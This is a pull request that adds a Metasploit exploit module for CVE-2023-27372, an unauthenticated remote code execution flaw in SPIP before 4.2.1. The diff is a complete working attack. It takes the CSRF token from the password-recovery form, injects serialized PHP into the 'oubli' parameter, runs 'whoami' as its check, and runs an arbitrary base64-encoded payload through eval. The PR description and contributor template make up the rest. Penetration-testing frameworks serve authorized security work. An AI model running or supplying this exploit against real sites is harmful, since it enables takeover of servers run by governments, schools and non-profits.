### PR TITLE
Create spip_oubli_param_rce.rb

### DIFF
--- a/modules/exploits/multi/http/spip_oubli_param_rce.rb
+++ b/modules/exploits/multi/http/spip_oubli_param_rce.rb
@@ -1,0 +1,116 @@
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = NormalRanking
+
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info={})
+    super(update_info(info,
+      'Name'           => 'SPIP < 4.2.1 - Remote Code Execution',
+      'Description'    => %q{
+        This module exploits a vulnerability in the SPIP content management system versions prior to 4.2.1. 
+        The vulnerability resides in the password recovery form, where the lack of proper input sanitization 
+        allows arbitrary PHP code injection leading to remote code execution. Successful exploitation grants 
+        attackers the ability to execute arbitrary code on the server in the context of the web application.
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'Chocapikk (Valentin Lobstein)', # Metasploit module
+          'nuts7' # Original discovery
+        ],
+      'References'     =>
+        [
+          [ 'CVE', '2023-27372'],
+        ],
+      'Platform'       => 'php',
+      'Arch'           => ARCH_PHP,
+      'Payload'        =>
+        {
+          'BadChars' => "\x00"
+        },
+      'Targets'        => [[ 'Automatic', { }]],
+      'DisclosureDate' => 'Jul 3 2023',
+      'DefaultTarget'  => 0
+    ))
+
+    register_options([
+      OptString.new('TARGETURI', [ true, 'The base URI of SPIP application', '/']),
+    ])
+  end
+
+
+  def check
+    print_status("Checking vulnerability...")
+    uri = normalize_uri(target_uri.path, 'spip.php?page=spip_pass')
+    response = send_request_cgi('method' => 'GET', 'uri' => uri)
+  
+    return Exploit::CheckCode::Unknown if response.nil?
+  
+    if response.body.include?('formulaire_action_args')
+      token = response.body.match(/name='formulaire_action_args'[^>]*value='([^']*)'/)&.captures&.first
+      command_str = "<?php system('echo [' . 'S' . '] ; ' . 'whoami' . '; echo [' . 'E' . '] ;');?>"
+      payload = "s:#{command_str.length}:\"#{command_str}\";"
+      result = send_payload(uri, token, payload)
+  
+      if result && result.body
+        output = parse_output(result.body)
+        return output ? Exploit::CheckCode::Vulnerable : Exploit::CheckCode::Safe
+      else
+        return Exploit::CheckCode::Safe
+      end
+    else
+      return Exploit::CheckCode::Safe
+    end
+  end
+  
+  def send_payload(uri, token, payload)
+    post_data = {
+      'formulaire_action' => 'oubli',
+      'formulaire_action_args' => token,
+      'oubli' => payload
+    }
+    
+    res = send_request_cgi({
+      'method' => 'POST',
+      'uri' => uri,
+      'vars_post' => post_data
+    })
+    
+    return res
+  end
+  
+  def parse_output(text)
+    matches = text.scan(/\[S\](.*?)\[E\]/m)
+    matches.join("\n") unless matches.empty?
+  end
+
+  def exploit
+    print_status("Exploiting...")
+    uri = normalize_uri(target_uri.path, 'spip.php?page=spip_pass')
+    response = send_request_cgi('method' => 'GET', 'uri' => uri)
+  
+    unless response && response.body.include?('formulaire_action_args')
+      fail_with(Failure::NoAccess, "Failed to retrieve the CSRF token")
+    end
+  
+    token = response.body.match(/name='formulaire_action_args'[^>]*value='([^']*)'/)&.captures&.first
+    command = Rex::Text.encode_base64(payload.encoded)
+    php_code = "<?php eval(base64_decode('#{command}'));?>"
+    payload_serialized = "s:#{php_code.length}:\"#{php_code}\";"
+  
+    post_data_payload = {
+      'formulaire_action' => 'oubli',
+      'formulaire_action_args' => token,
+      'oubli' => payload_serialized
+    }
+  
+    final_response = send_request_cgi({
+      'method' => 'POST',
+      'uri' => uri,
+      'vars_post' => post_data_payload
+    })
+  
+    print_good("Payload was executed!")
+    handler
+  end
+end


### PR DESCRIPTION
This module exploits a critical remote code execution vulnerability in SPIP, a widespread open-source CMS platform, utilized by numerous governmental, educational, and non-profit institutions. A lack of input sanitization and improper handling of form serialization in the 'oubli' parameter (public area) allows unauthenticated users to inject and execute arbitrary PHP commands with the privileges of the web server user.

The module specifically targets SPIP versions prior to 4.2.1, with affected branches being 3.2, 4.0, 4.1, and 4.2. The vulnerability has been patched in versions 3.2.18, 4.0.10, 4.1.8, and 4.2.1.

Tell us what this change does. If you're fixing a bug, please mention
the github issue number.

Please ensure you are submitting **from a unique branch** in your [repository](https://github.com/rapid7/metasploit-framework/pull/11086#issuecomment-445506416) to master in Rapid7's.

## Verification

List the steps needed to make sure this thing works

- [ ] Start `msfconsole`
- [ ] `use exploit/windows/smb/ms08_067_netapi`
- [ ] ...
- [ ] **Verify** the thing does what it should
- [ ] **Verify** the thing does not do what it should not
- [ ] **Document** the thing and how it works ([Example](https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/post/multi/gather/aws_keys.md))

If you are opening a PR for a new module that exploits a **specific** piece of hardware or requires a **complex or hard-to-find** testing environment, we recommend that you send us a demo of your module executing correctly. Seeing your module in action will help us review your PR faster!

Specific Hardware Examples:
* Switches
* Routers
* IP Cameras
* IoT devices

Complex Software Examples:
* Expensive proprietary software
* Software with an extensive installation process
* Software that requires exploit testing across multiple significantly different versions
* Software without an English language UI

We will also accept demonstrations of successful module execution even if your module doesn't meet the above conditions. It's not a necessity, but it may help us land your module faster!

Demonstration of successful module execution can take the form of a packet capture (pcap) or a screen recording. You can send pcaps and recordings to [msfdev@metasploit.com](mailto:msfdev@metasploit.com). Please include a CVE number in the subject header (if applicable), and a link to your PR in the email body.
If you wish to sanitize your pcap, please see the [wiki](https://docs.metasploit.com/docs/development/get-started/sanitizing-pcaps.html).
